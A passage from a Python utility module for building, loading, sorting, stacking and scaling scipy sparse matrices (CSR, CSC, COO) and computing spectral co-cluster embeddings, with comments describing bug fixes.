    indptr_dtype = get_index_dtype(indptr, check_contents=check_contents)

    if shape is None:
        # Infer dimensions from the *input* arrays. (The previous code built
        # an empty matrix first and inspected its indptr/indices, so the
        # inference could never succeed.)
        try:
            major_dim = len(indptr) - 1
            minor_dim = int(max(indices)) + 1 if len(indices) else 0
        except Exception:
            raise ValueError("unable to infer matrix dimensions")
        # The major axis is rows for CSR and columns for CSC.
        if mat_type is smat.csr_matrix:
            shape = (major_dim, minor_dim)
        else:
            shape = (minor_dim, major_dim)

    ret = mat_type(shape, dtype=dtype)
    if copy:
        ret.indices = np.array(indices, dtype=indices_dtype)
        ret.indptr = np.array(indptr, dtype=indptr_dtype)
        ret.data = np.array(data, dtype=dtype)
    else:
        # np.asarray copies only when a dtype conversion demands it, matching
        # the numpy<2 meaning of np.array(..., copy=False) while remaining
        # valid on numpy>=2, where copy=False means "never copy".
        ret.indices = np.asarray(indices, dtype=indices_dtype)
        ret.indptr = np.asarray(indptr, dtype=indptr_dtype)
        ret.data = np.asarray(data, dtype=dtype)
    return ret
def csr_matrix(arg1, shape=None, dtype=None, copy=False):
    """Build a csr_matrix whose indices and indptr may use different integer types.

    Thin wrapper delegating to :func:`cs_matrix` with the CSR format.

    Args:
        arg1 (tuple): (data, indices, indptr) triplet of the CSR matrix.
        shape (tuple, optional): matrix shape; None infers it from arg1.
        dtype (type, optional): value dtype; None infers it from data.
        copy (bool, optional): copy the input arrays if True. Defaults to False.

    Returns:
        csr_matrix
    """
    kwargs = dict(shape=shape, dtype=dtype, copy=copy)
    return cs_matrix(arg1, smat.csr_matrix, **kwargs)
def csc_matrix(arg1, shape=None, dtype=None, copy=False):
    """Build a csc_matrix whose indices and indptr may use different integer types.

    Thin wrapper delegating to :func:`cs_matrix` with the CSC format.

    Args:
        arg1 (tuple): (data, indices, indptr) triplet of the CSC matrix.
        shape (tuple, optional): matrix shape; None infers it from arg1.
        dtype (type, optional): value dtype; None infers it from data.
        copy (bool, optional): copy the input arrays if True. Defaults to False.

    Returns:
        csc_matrix
    """
    kwargs = dict(shape=shape, dtype=dtype, copy=copy)
    return cs_matrix(arg1, smat.csc_matrix, **kwargs)
def save_matrix(tgt, mat):
    """Persist a dense or sparse matrix at the given path.

    Dense ndarrays are written via ``np.save`` (.npy layout); scipy sparse
    matrices via ``smat.save_npz`` (uncompressed .npz layout).

    Args:
        tgt (str): destination path.
        mat (numpy.ndarray or scipy.sparse.spmatrix): matrix to persist.

    Raises:
        NotImplementedError: if mat is neither dense nor scipy sparse.
    """
    assert isinstance(tgt, str), "tgt for save_matrix must be a str, but got {}".format(type(tgt))
    with open(tgt, "wb") as fout:
        if isinstance(mat, smat.spmatrix):
            smat.save_npz(fout, mat, compressed=False)
        elif isinstance(mat, np.ndarray):
            np.save(fout, mat, allow_pickle=False)
        else:
            raise NotImplementedError("Save not implemented for matrix type {}".format(type(mat)))
def load_matrix(src, dtype=None):
    """Load dense or sparse matrix from file.

    Args:
        src (str): path to load the matrix from.
        dtype (numpy.dtype, optional): if given, convert the loaded matrix to
            this dtype. Otherwise keep the stored dtype.

    Returns:
        mat (numpy.ndarray or scipy.sparse.spmatrix): loaded matrix.

    Raises:
        ValueError: if src is not a str or the sparse format is unrecognized.
        NotImplementedError: if the sparse format has no loader implemented.
        TypeError: if the file holds neither a dense nor a sparse matrix.

    Notes:
        If underlying matrix is {"csc", "csr", "bsr"}, indices will be sorted.
    """
    if not isinstance(src, str):
        raise ValueError("src for load_matrix must be a str")
    mat = np.load(src)
    # decide whether it's dense or sparse
    if isinstance(mat, np.ndarray):
        pass
    elif isinstance(mat, np.lib.npyio.NpzFile):
        # Ref code: https://github.com/scipy/scipy/blob/v1.4.1/scipy/sparse/_matrix_io.py#L19-L80
        matrix_format = mat["format"].item()
        if not isinstance(matrix_format, str):
            # files saved with SciPy < 1.0.0 may contain unicode or bytes.
            matrix_format = matrix_format.decode("ascii")
        try:
            cls = getattr(smat, "{}_matrix".format(matrix_format))
        except AttributeError:
            raise ValueError("Unknown matrix format {}".format(matrix_format))
        if matrix_format in ("csc", "csr", "bsr"):
            mat = cls((mat["data"], mat["indices"], mat["indptr"]), shape=mat["shape"])
            # in-place: guarantees canonical ascending index order per row/col
            mat.sort_indices()
        elif matrix_format == "dia":
            mat = cls((mat["data"], mat["offsets"]), shape=mat["shape"])
        elif matrix_format == "coo":
            mat = cls((mat["data"], (mat["row"], mat["col"])), shape=mat["shape"])
        else:
            raise NotImplementedError(
                "Load is not implemented for sparse matrix of format {}.".format(matrix_format)
            )
    else:
        # fixed: the message previously referenced "load_feature_matrix",
        # which is not this function's name
        raise TypeError("load_matrix encountered unknown input format {}".format(type(mat)))
    if dtype is None:
        return mat
    else:
        return mat.astype(dtype)
def transpose(mat):
    """Transpose a sparse matrix without copying its underlying arrays.

    For CSR/CSC inputs the transpose is obtained by reinterpreting the same
    (data, indices, indptr) triplet in the opposite compressed format; other
    sparse types fall back to scipy's ``.T``.

    Args:
        mat (smat.spmatrix): input sparse matrix.

    Returns:
        the transposed matrix.

    Raises:
        ValueError: if mat is not a scipy sparse matrix.
    """
    if not isinstance(mat, smat.spmatrix):
        raise ValueError("mat must be a smat.spmatrix type")
    flipped_shape = (mat.shape[1], mat.shape[0])
    if isinstance(mat, smat.csr_matrix):
        return csc_matrix((mat.data, mat.indices, mat.indptr), shape=flipped_shape)
    if isinstance(mat, smat.csc_matrix):
        return csr_matrix((mat.data, mat.indices, mat.indptr), shape=flipped_shape)
    return mat.T
def sorted_csr_from_coo(shape, row_idx, col_idx, val, only_topk=None):
    """Return a row-sorted CSR matrix from a COO sparse matrix.

    Nonzero elements in each row of the returned CSR matrix are sorted in
    descending order of value (stable, so ties keep ascending column order).
    If only_topk is given, only the topk largest elements per row are kept.

    Args:
        shape (tuple): the shape of the input COO matrix
        row_idx (ndarray): row indices of the input COO matrix
        col_idx (ndarray): col indices of the input COO matrix
        val (ndarray): values of the input COO matrix
        only_topk (int, optional): keep only topk (clamped to >= 1) elements
            per row. Default None to ignore.

    Returns:
        csr_matrix
    """
    csr = smat.csr_matrix((val, (row_idx, col_idx)), shape=shape)
    csr.sort_indices()
    for i in range(shape[0]):
        rng = slice(csr.indptr[i], csr.indptr[i + 1])
        # mergesort is stable, so equal values keep their column order
        sorted_idx = np.argsort(-csr.data[rng], kind="mergesort")
        csr.indices[rng] = csr.indices[rng][sorted_idx]
        csr.data[rng] = csr.data[rng][sorted_idx]
    if only_topk is not None:
        assert isinstance(only_topk, int), f"Wrong type: type(only_topk) = {type(only_topk)}"
        # clamp to at least one kept entry per row; the previous expression
        # max(min(1, only_topk), only_topk) was a no-op and never clamped
        only_topk = max(1, only_topk)
        nnz_of_insts = csr.indptr[1:] - csr.indptr[:-1]
        row_idx = np.repeat(np.arange(shape[0], dtype=csr.indices.dtype), nnz_of_insts)
        # rows are already sorted descending, so a row's first only_topk
        # stored positions are exactly its largest entries
        selected_idx = (np.arange(len(csr.data)) - csr.indptr[row_idx]) < only_topk
        row_idx = row_idx[selected_idx]
        col_idx = csr.indices[selected_idx]
        val = csr.data[selected_idx]
        indptr = np.cumsum(np.bincount(row_idx + 1, minlength=(shape[0] + 1)))
        csr = csr_matrix((val, col_idx, indptr), shape=shape, dtype=val.dtype)
    return csr
def sorted_csc_from_coo(shape, row_idx, col_idx, val, only_topk=None):
    """Return a column-sorted CSC matrix from a COO sparse matrix.

    Nonzero elements in each column of the returned CSC matrix are sorted in
    descending order of value. If only_topk is given, only the topk largest
    elements per column are kept.

    Implemented by sorting the transposed problem row-wise and transposing
    the result back.

    Args:
        shape (tuple): the shape of the input COO matrix
        row_idx (ndarray): row indices of the input COO matrix
        col_idx (ndarray): col indices of the input COO matrix
        val (ndarray): values of the input COO matrix
        only_topk (int, optional): keep only topk elements per col. Default None to ignore

    Returns:
        csc_matrix
    """
    # fixed: only_topk was previously hard-coded to None in this call,
    # silently disabling the documented per-column truncation
    csr = sorted_csr_from_coo(shape[::-1], col_idx, row_idx, val, only_topk=only_topk)
    return transpose(csr)
def binarized(X, inplace=False):
    """Binarize a dense/sparse matrix: every nonzero element becomes 1.

    Args:
        X (np.ndarray or spmatrix): input matrix to binarize.
        inplace (bool, optional): if True binarize X itself, else work on a
            copy. Default False.

    Returns:
        the binarized matrix (X itself when inplace is True).

    Raises:
        NotImplementedError: if X is neither ndarray nor scipy sparse.
    """
    if not isinstance(X, (np.ndarray, smat.spmatrix)):
        raise NotImplementedError(
            "this function only support X being np.ndarray or scipy.sparse.spmatrix."
        )
    if not inplace:
        X = X.copy()
    if isinstance(X, smat.spmatrix):
        # only stored (nonzero) entries are touched
        X.data[:] = 1
    else:
        # fixed: X[:] = 1 set *every* dense entry (zeros included) to 1,
        # contradicting the documented "nonzero elements become 1" contract
        X[X != 0] = 1
    return X
def sorted_csr(csr, only_topk=None):
    """Return a copy of ``csr`` whose rows store their nonzeros in descending value order.

    If ``only_topk`` is given, only the top-k largest elements per row are kept.

    Args:
        csr (csr_matrix): input csr_matrix to sort.
        only_topk (int, optional): keep only topk elements per row. Default None to ignore.

    Returns:
        csr_matrix

    Raises:
        ValueError: if the input is not a csr_matrix.
    """
    if not isinstance(csr, smat.csr_matrix):
        raise ValueError("the input matrix must be a csr_matrix.")
    # Expand the compressed row pointer into one row id per stored element,
    # then delegate to the COO-based implementation.
    nnz_per_row = csr.indptr[1:] - csr.indptr[:-1]
    expanded_rows = np.repeat(np.arange(csr.shape[0], dtype=np.uint32), nnz_per_row)
    return sorted_csr_from_coo(csr.shape, expanded_rows, csr.indices, csr.data, only_topk)
def sorted_csc(csc, only_topk=None):
    """Return a copy of ``csc`` whose columns store their nonzeros in descending value order.

    If ``only_topk`` is given, only the top-k largest elements per column are kept.

    Args:
        csc (csc_matrix): input csc_matrix to sort.
        only_topk (int, optional): keep only topk elements per col. Default None to ignore.

    Returns:
        csc_matrix

    Raises:
        ValueError: if the input is not a csc_matrix.
    """
    if not isinstance(csc, smat.csc_matrix):
        raise ValueError("the input matrix must be a csc_matrix.")
    # fixed: only_topk was previously dropped instead of being forwarded to
    # sorted_csr, so the documented per-column truncation never happened
    return transpose(sorted_csr(transpose(csc), only_topk=only_topk))
def dense_to_csr(dense, topk=None, batch=None):
    """Memory efficient method to construct a csr_matrix from a dense matrix.

    Args:
        dense (ndarray): 2-D dense matrix to convert.
        topk (int or None, optional): keep the topk entries with largest abs
            value in each row. Default None to keep everything.
        batch (int or None, optional): number of rows converted per chunk.
            Default None to use min(dense.shape[0], 10 ** 5).

    Returns:
        csr_matrix with at most topk stored entries per row, same shape as dense.
    """
    BATCH_LIMIT = 10 ** 5
    if topk is None:
        keep_topk = dense.shape[1]
    else:
        keep_topk = min(dense.shape[1], max(1, int(topk)))
    # if batch is given, use input batch size even if input batch > BATCH_LIMIT
    if batch is None:
        chunk_size = min(dense.shape[0], BATCH_LIMIT)
    else:
        chunk_size = min(dense.shape[0], max(1, int(batch)))
    max_nnz = keep_topk * dense.shape[0]
    indptr_dtype = np.int32 if max_nnz < np.iinfo(np.int32).max else np.int64
    indices_dtype = np.int32 if dense.shape[1] < np.iinfo(np.int32).max else np.int64
    data = np.empty(max_nnz, dtype=dense.dtype)
    indices = np.empty(max_nnz, dtype=indices_dtype)
    for i in range(0, dense.shape[0], chunk_size):
        cur_chunk = dense[i : i + chunk_size, :]
        chunk_len = cur_chunk.shape[0]
        if keep_topk < dense.shape[1]:
            # fixed: kth must be -keep_topk so the LAST keep_topk positions of
            # the partition hold exactly the keep_topk largest |values|; the
            # previous kth=keep_topk only guaranteed those positions were
            # among the (ncols - keep_topk) largest, not the true top-k.
            col_indices = np.argpartition(np.abs(cur_chunk), -keep_topk, axis=1)[:, -keep_topk:]
        else:
            # keeping every column: emit them in natural order
            col_indices = np.repeat(np.arange(keep_topk)[np.newaxis, :], chunk_len, axis=0)
        row_indices = np.repeat(np.arange(chunk_len)[:, np.newaxis], keep_topk, axis=1)
        chunk_data = cur_chunk[row_indices, col_indices]
        data[i * keep_topk : i * keep_topk + chunk_data.size] = chunk_data.flatten()
        indices[i * keep_topk : i * keep_topk + col_indices.size] = col_indices.flatten()
    # every row stores exactly keep_topk entries, so indptr is a fixed stride
    indptr = np.arange(0, dense.shape[0] * keep_topk + 1, keep_topk, dtype=indptr_dtype)
    # Bypass scipy's constructor so indices and indptr can keep different dtypes
    return csr_matrix((data, indices, indptr), shape=dense.shape)
def vstack_csr(matrices, dtype=None):
    """Memory efficient method to stack csr_matrices vertically.

    The returned matrix will retain the indices order.

    Args:
        matrices (list or tuple of csr_matrix): the matrices to stack in order, with shape (M1 x N), (M2 x N), ...
        dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices

    Returns:
        csr_matrix with shape (M1 + M2 + ..., N)
    """
    if not isinstance(matrices, (list, tuple)):
        raise ValueError("matrices should be either list or tuple")
    if any(not isinstance(X, smat.csr_matrix) for X in matrices):
        raise ValueError("all matrix in matrices need to be csr_matrix!")
    if len(matrices) <= 1:
        # Nothing to stack: single input is returned as-is, empty input gives None.
        return matrices[0] if len(matrices) == 1 else None
    nr_cols = matrices[0].shape[1]
    if any(mat.shape[1] != nr_cols for mat in matrices):
        raise ValueError("Second dim not match")
    # Cast to Python int so the running sums cannot overflow a fixed-width dtype.
    total_nnz = sum([int(mat.nnz) for mat in matrices])
    total_rows = sum([int(mat.shape[0]) for mat in matrices])
    # infer result dtypes from inputs
    int32max = np.iinfo(np.int32).max
    if dtype is None:
        dtype = smat.sputils.upcast(*[mat.dtype for mat in matrices])
    # indices address columns (unchanged by vstack); indptr addresses nnz offsets.
    indices_dtype = np.int64 if nr_cols > int32max else np.int32
    indptr_dtype = np.int64 if total_nnz > int32max else np.int32
    indptr = np.empty(total_rows + 1, dtype=indptr_dtype)
    indices = np.empty(total_nnz, dtype=indices_dtype)
    data = np.empty(total_nnz, dtype=dtype)
    indptr[0], cur_nnz, cur_row = 0, 0, 0
    for mat in matrices:
        # Copy each block's CSR arrays into the preallocated output buffers.
        indices[cur_nnz : cur_nnz + mat.nnz] = mat.indices
        data[cur_nnz : cur_nnz + mat.nnz] = mat.data
        # can not merge the following two lines because
        # mat.indptr[1:] + cur_nnz may overflow!
        indptr[cur_row + 1 : cur_row + mat.shape[0] + 1] = mat.indptr[1:]
        indptr[cur_row + 1 : cur_row + mat.shape[0] + 1] += cur_nnz
        cur_nnz += mat.nnz
        cur_row += mat.shape[0]
    return csr_matrix((data, indices, indptr), shape=(total_rows, nr_cols))
def hstack_csr(matrices, dtype=None):
    """Memory efficient method to stack csr_matrices horizontally.

    The returned matrix will retain the indices order.

    Args:
        matrices (list or tuple of csr_matrix): the matrices to stack in order, with shape (M x N1), (M x N2), ...
        dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices

    Returns:
        csr_matrix with shape (M, N1 + N2 + ...)
    """
    if not isinstance(matrices, (list, tuple)):
        raise ValueError("matrices should be either list or tuple")
    if any(not isinstance(X, smat.csr_matrix) for X in matrices):
        raise ValueError("all matrix in matrices need to be csr_matrix!")
    if len(matrices) <= 1:
        return matrices[0] if len(matrices) == 1 else None
    nr_rows = matrices[0].shape[0]
    if any(mat.shape[0] != nr_rows for mat in matrices):
        raise ValueError("First dim not match")
    total_nnz = sum([int(mat.nnz) for mat in matrices])
    total_cols = sum([int(mat.shape[1]) for mat in matrices])
    # infer result dtypes from inputs
    int32max = np.iinfo(np.int32).max
    if dtype is None:
        dtype = smat.sputils.upcast(*[mat.dtype for mat in matrices])
    # BUGFIX: indices address columns of the stacked result, so the dtype must
    # be chosen from total_cols. It was previously keyed on nr_rows, which
    # could pick int32 and silently overflow for results wider than 2^31.
    indices_dtype = np.int64 if total_cols > int32max else np.int32
    indptr_dtype = np.int64 if total_nnz > int32max else np.int32
    indptr = np.empty(nr_rows + 1, dtype=indptr_dtype)
    indices = np.empty(total_nnz, dtype=indices_dtype)
    data = np.empty(total_nnz, dtype=dtype)
    indptr[0], cur_ptr = 0, 0
    for i in range(nr_rows):  # for every row
        start_col = 0
        for mat in matrices:
            cur_nnz = mat.indptr[i + 1] - mat.indptr[i]
            # Copy first, then shift inside the output buffer: adding start_col
            # to mat.indices directly may overflow mat's (possibly int32) dtype.
            indices[cur_ptr : cur_ptr + cur_nnz] = mat.indices[mat.indptr[i] : mat.indptr[i + 1]]
            indices[cur_ptr : cur_ptr + cur_nnz] += start_col
            data[cur_ptr : cur_ptr + cur_nnz] = mat.data[mat.indptr[i] : mat.indptr[i + 1]]
            cur_ptr += cur_nnz
            start_col += mat.shape[1]
        indptr[i + 1] = cur_ptr
    return csr_matrix((data, indices, indptr), shape=(nr_rows, total_cols))
def block_diag_csr(matrices, dtype=None):
    """Memory efficient method to stack csr_matrices block diagonally.

    The returned matrix will retain the indices order.

    Args:
        matrices (list or tuple of csr_matrix): the matrices to stack in order, with shape (NR1 x NC1), (NR2 x NC2), ...
        dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices

    Returns:
        csr_matrix with shape (NR1 + NR2 + ..., NC1 + NC2 + ...)
    """
    if not isinstance(matrices, (list, tuple)):
        raise ValueError("matrices should be either list or tuple")
    if any(not isinstance(X, smat.csr_matrix) for X in matrices):
        raise ValueError("all matrix in matrices need to be csr_matrix!")
    if len(matrices) <= 1:
        return matrices[0] if len(matrices) == 1 else None
    total_nnz = sum([int(mat.nnz) for mat in matrices])
    total_rows = sum([int(mat.shape[0]) for mat in matrices])
    total_cols = sum([int(mat.shape[1]) for mat in matrices])
    # infer result dtypes from inputs
    int32max = np.iinfo(np.int32).max
    if dtype is None:
        dtype = smat.sputils.upcast(*[mat.dtype for mat in matrices])
    # BUGFIX: indices address columns, so the dtype must be chosen from
    # total_cols (was total_rows, which could silently overflow for wide
    # results). indptr addresses nnz offsets as before.
    indices_dtype = np.int64 if total_cols > int32max else np.int32
    indptr_dtype = np.int64 if total_nnz > int32max else np.int32
    indptr = np.empty(total_rows + 1, dtype=indptr_dtype)
    indices = np.empty(total_nnz, dtype=indices_dtype)
    data = np.empty(total_nnz, dtype=dtype)
    cur_row, cur_col, cur_nnz = 0, 0, 0
    indptr[0] = 0
    for mat in matrices:
        data[cur_nnz : cur_nnz + mat.nnz] = mat.data
        # Copy first, then shift in the (wider) output buffer, so the addition
        # cannot overflow mat's own (possibly int32) index dtypes.
        indices[cur_nnz : cur_nnz + mat.nnz] = mat.indices
        indices[cur_nnz : cur_nnz + mat.nnz] += cur_col
        indptr[1 + cur_row : 1 + cur_row + mat.shape[0]] = mat.indptr[1:]
        indptr[1 + cur_row : 1 + cur_row + mat.shape[0]] += cur_nnz
        cur_col += mat.shape[1]
        cur_row += mat.shape[0]
        cur_nnz += mat.nnz
    return csr_matrix((data, indices, indptr), shape=(total_rows, total_cols))
def vstack_csc(matrices, dtype=None):
    """Memory efficient method to stack csc_matrices vertically.

    The returned matrix will retain the indices order.

    Args:
        matrices (list or tuple of csc_matrix): the matrices to stack in order, with shape (M1 x N), (M2 x N), ...
        dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices

    Returns:
        csc_matrix with shape (M1 + M2 + ..., N)
    """
    if not isinstance(matrices, (list, tuple)):
        raise ValueError("matrices should be either list or tuple")
    for mat in matrices:
        if not isinstance(mat, smat.csc_matrix):
            raise ValueError("all matrix in matrices need to be csc_matrix!")
    if len(matrices) == 0:
        return None
    if len(matrices) == 1:
        return matrices[0]
    # Vertical CSC stacking == transpose of horizontal CSR stacking of the transposes.
    transposed = [transpose(mat) for mat in matrices]
    return transpose(hstack_csr(transposed, dtype=dtype))
def hstack_csc(matrices, dtype=None):
    """Memory efficient method to stack csc_matrices horizontally.

    The returned matrix will retain the indices order.

    Args:
        matrices (list or tuple of csc_matrix): the matrices to stack in order, with shape (M x N1), (M x N2), ...
        dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices

    Returns:
        csc_matrix with shape (M, N1 + N2 + ...)
    """
    if not isinstance(matrices, (list, tuple)):
        raise ValueError("matrices should be either list or tuple")
    for mat in matrices:
        if not isinstance(mat, smat.csc_matrix):
            raise ValueError("all matrix in matrices need to be csc_matrix!")
    if len(matrices) == 0:
        return None
    if len(matrices) == 1:
        return matrices[0]
    # Horizontal CSC stacking == transpose of vertical CSR stacking of the transposes.
    transposed = [transpose(mat) for mat in matrices]
    return transpose(vstack_csr(transposed, dtype=dtype))
def block_diag_csc(matrices, dtype=None):
    """Memory efficient method to stack csc_matrices block diagonally.

    The returned matrix will retain the indices order.

    Args:
        matrices (list or tuple of csr_matrix): the matrices to stack in order, with shape (NR1 x NC1), (NR2 x NC2), ...
        dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices

    Returns:
        csc_matrix with shape (NR1+ NR2 + ..., NC1 + NC2 + ...)
    """
    if not isinstance(matrices, (list, tuple)):
        raise ValueError("matrices should be either list or tuple")
    for mat in matrices:
        if not isinstance(mat, smat.csc_matrix):
            raise ValueError("all matrix in matrices need to be csc_matrix!")
    if len(matrices) == 0:
        return None
    if len(matrices) == 1:
        return matrices[0]
    # Block-diagonal stacking commutes with transposition, so delegate to the CSR variant.
    transposed = [transpose(mat) for mat in matrices]
    return transpose(block_diag_csr(transposed, dtype=dtype))
def get_csc_col_nonzero(matrix):
    """Given a matrix, returns the nonzero row ids of each col

    The returned ndarray will retain the indices order.

    Args:
        matrix: the matrix to operate on, with shape (N x M)

    Returns:
        list of ndarray [a_1, a_2, a_3, ...], where a_i is an array indicate the nonzero row ids of col i
    """
    if not isinstance(matrix, smat.csc_matrix):
        raise ValueError("matrix need to be csc_matrix!")
    nonzero_rows = []
    for col in range(matrix.shape[1]):
        start, end = matrix.indptr[col], matrix.indptr[col + 1]
        nonzero_rows.append(matrix.indices[start:end])
    return nonzero_rows
def get_csr_row_nonzero(matrix):
    """Given a matrix, returns the nonzero col ids of each row

    The returned ndarray will retain the indices order.

    Args:
        matrix: the matrix to operate on, with shape (N x M)

    Returns:
        list of ndarray [a_1, a_2, a_3, ...], where a_i is an array indicate the nonzero col ids of row i
    """
    if not isinstance(matrix, smat.csr_matrix):
        raise ValueError("matrix need to be csr_matrix!")
    nonzero_cols = []
    for row in range(matrix.shape[0]):
        start, end = matrix.indptr[row], matrix.indptr[row + 1]
        nonzero_cols.append(matrix.indices[start:end])
    return nonzero_cols
def get_row_submatrices(matrices, row_indices):
    """Get the sub-matrices of given matrices by selecting the rows given in row_indices

    Args:
        matrices (list of csr_matrix or ndarray): the matrices [mat_1, mat_2, ...] to operate on, with shape (M x N1), (M x N2), ...
        row_indices (list or ndarray): the row indices to select

    Returns:
        list of csr_matrix or ndarray
    """
    if not isinstance(matrices, (list, tuple)):
        raise ValueError("matrices should be either list or tuple")
    if len(matrices) == 0:
        raise ValueError("At least one matrix required as input")
    for mat in matrices:
        if not isinstance(mat, (smat.csr_matrix, np.ndarray)):
            raise ValueError("all matrix in matrices need to be csr_matrix or ndarray!")
    nr_rows = matrices[0].shape[0]
    for mat in matrices:
        if mat.shape[0] != nr_rows:
            raise ValueError("First dim not match")
    for idx in row_indices:
        if idx < 0 or idx >= nr_rows:
            raise ValueError("row indices should be positive and do not exceed matrix first dimension")
    selected = []
    for mat in matrices:
        submat = mat[row_indices, :]
        if isinstance(mat, smat.csr_matrix):
            # Fancy row indexing may leave column indices unsorted; restore canonical order.
            submat.sort_indices()
        selected.append(submat)
    return selected
def dense_to_coo(dense):
    """Convert a dense matrix to COO format.

    Every entry of `dense` (including explicit zeros) is stored.

    Args:
        dense (ndarray): input dense matrix

    Returns:
        coo_matrix
    """
    n_rows, n_cols = dense.shape
    row_ids = np.arange(n_rows, dtype=np.uint32)
    col_ids = np.arange(n_cols, dtype=np.uint32)
    # Row index repeats each row id once per column; column index tiles the
    # column ids once per row, matching dense.ravel()'s row-major order.
    row_idx = np.repeat(row_ids, n_cols).astype(np.uint32)
    col_idx = np.tile(col_ids, n_rows)
    return smat.coo_matrix((dense.ravel(), (row_idx, col_idx)), shape=dense.shape)
def get_relevance_csr(csr, mm=None, dtype=np.float64):
    """Return the csr matrix containing relevance scores based on given prediction csr matrix.

    Relevance score is defined as: max_rank - local_rank + 1

    Args:
        csr (csr_matrix): input CSR matrix, row indices are sorted in descending order
        mm (int, optional): max rank, will be inferred from csr if not given
        dtype (type, optional): datatype for the returned relevance matrix. Default float64.

    Returns:
        csr_matrix of relevance scores
    """
    row_nnz = csr.indptr[1:] - csr.indptr[:-1]
    if mm is None:
        mm = row_nnz.max()
    nnz = len(csr.data)
    # Map every stored entry back to its row id, then derive its 0-based rank
    # within that row; the top-ranked entry scores mm, the next mm - 1, etc.
    # (equivalently max_rank - rank + 1 with 1-based ranks).
    row_idx = np.repeat(np.arange(csr.shape[0]), row_nnz)
    local_rank = np.arange(nnz) - csr.indptr[row_idx]
    rel = np.array(mm - local_rank, dtype=dtype)
    return smat.csr_matrix((rel, csr.indices, csr.indptr), csr.shape)
def get_sparsified_coo(coo, selected_rows, selected_columns):
    """
    Zero out everything not in selected rows and columns.

    Args:
        coo (coo_matrix): input coo matrix
        selected_rows (list of int or np.array(int)): list of rows to be not zeroed out
        selected_columns (list of int or np.array(int)): list of columns to be not zeroed out

    Returns:
        coo matrix with unwanted rows and columns zeroed out.
    """
    # Boolean masks over the full row/column ranges make the per-entry filter
    # a single vectorized gather instead of set-membership tests.
    row_mask = np.zeros(coo.shape[0], dtype=bool)
    col_mask = np.zeros(coo.shape[1], dtype=bool)
    row_mask[selected_rows] = True
    col_mask[selected_columns] = True
    keep = row_mask[coo.row] & col_mask[coo.col]
    return smat.coo_matrix(
        (coo.data[keep], (coo.row[keep], coo.col[keep])), shape=coo.shape
    )
def csr_rowwise_mul(A, v):
    """Row-wise multiplication between sparse csr matrix A and dense array v.

    Each row of A is multiplied by the corresponding element in v, i.e.
    Z[i, :] = A[i, :] * v[i]. The number of rows of A is same as the length of v.

    Args:
        A (csr_matrix): The matrix to be multiplied.
        v (ndarray): The multiplying vector.

    Returns:
        Z (csr_matrix): The product of row-wise multiplication of A and v.

    Raises:
        ValueError: if A or v has the wrong type, or their shapes are incompatible.
    """
    if not isinstance(A, smat.csr_matrix):
        raise ValueError("A must be scipy.sparse.csr_matrix")
    if not isinstance(v, np.ndarray):
        raise ValueError("v must be a numpy ndarray")
    if v.ndim != 1:
        raise ValueError("v should be an 1-d array")
    if v.shape[0] != A.shape[0]:
        raise ValueError("The dimension of v should be the same as the number of rows of A")
    Z = A.copy()
    # Vectorized scaling: expand v so that each stored entry is paired with its
    # row's multiplier, replacing the previous Python-level loop over rows.
    row_nnz = np.diff(Z.indptr)
    Z.data *= np.repeat(v, row_nnz)
    return Z
def csc_colwise_mul(A, v):
    """Column-wise multiplication between sparse csc matrix A and dense array v.

    Each column of A is multiplied by the corresponding element in v, i.e.
    Z[:, j] = A[:, j] * v[j]. The number of columns of A is same as the length of v.

    Args:
        A (csc_matrix): The matrix to be multiplied.
        v (ndarray): The multiplying vector.

    Returns:
        Z (csc_matrix): The product of column-wise multiplication of A and v.

    Raises:
        ValueError: if A or v has the wrong type, or their shapes are incompatible.
    """
    if not isinstance(A, smat.csc_matrix):
        raise ValueError("A must be scipy.sparse.csc_matrix")
    if not isinstance(v, np.ndarray):
        raise ValueError("v must be a numpy ndarray")
    if v.ndim != 1:
        raise ValueError("v should be an 1-d array")
    if v.shape[0] != A.shape[1]:
        raise ValueError("The dimension of v should be the same as the number of columns of A")
    Z = A.copy()
    # Vectorized scaling: expand v so that each stored entry is paired with its
    # column's multiplier, replacing the previous Python-level loop over columns.
    col_nnz = np.diff(Z.indptr)
    Z.data *= np.repeat(v, col_nnz)
    return Z
def get_cocluster_spectral_embeddings(A, dim=24):
    """Obtain the co-cluster spectral embeddings for the given bipartite graph described in [1]

    * [1] `Dhillon, Inderjit S, 2001. Co-clustering documents and words using
      bipartite spectral graph partition`

    Args:
        A (csr_matrix or csc_matrix): bipartite graph matrix
        dim (int, optional): the dimension of the returned embeddings. Default 24

    Returns:
        (row_embedding, col_embedding): a tuple of embeddings for rows and columns respectively
            row_embedding: numpy.ndarray of shape (A.shape[0], dim).
            col_embedding: numpy.ndarray of shape (A.shape[1], dim).
    """
    assert A.min() >= 0.0, "A must be nonnegative"

    from sklearn.utils.extmath import randomized_svd

    # Obtain An, the normalized adjacency bipartite matrix described in Eq (10) of [1]
    # A_n = D_1^{-1/2} A D_2^{-1/2}
    # row_diag = diagonal of D_1^{-1/2}
    # col_diag = diagonal of D_2^{-1/2}
    row_diag = np.asarray(np.sqrt(A.sum(axis=1))).squeeze()
    col_diag = np.asarray(np.sqrt(A.sum(axis=0))).squeeze()
    # Guard against empty rows/columns: leave their scale at 1 instead of
    # dividing by zero below.
    row_diag[row_diag == 0] = 1.0
    col_diag[col_diag == 0] = 1.0
    row_diag = 1.0 / row_diag
    col_diag = 1.0 / col_diag
    if smat.issparse(A):
        # Keep the normalization sparse via diagonal-matrix products.
        n_rows, n_cols = A.shape
        r = smat.dia_matrix((row_diag, [0]), shape=(n_rows, n_rows))
        c = smat.dia_matrix((col_diag, [0]), shape=(n_cols, n_cols))
        An = r * A * c
    else:
        An = row_diag[:, np.newaxis] * A * col_diag
    # run SVD on An
    nr_discards = 1  # discarding the first component
    U, Sigma, VT = randomized_svd(An, dim + nr_discards, random_state=0)
    # Normalized the singular vectors based on Eq (24) of [1]
    row_embedding = np.ascontiguousarray(row_diag[:, np.newaxis] * U[:, nr_discards:])
    col_embedding = np.ascontiguousarray(col_diag[:, np.newaxis] * VT[nr_discards:].T)
    return row_embedding, col_embedding
| 38.992408 | 208 | 0.648549 |
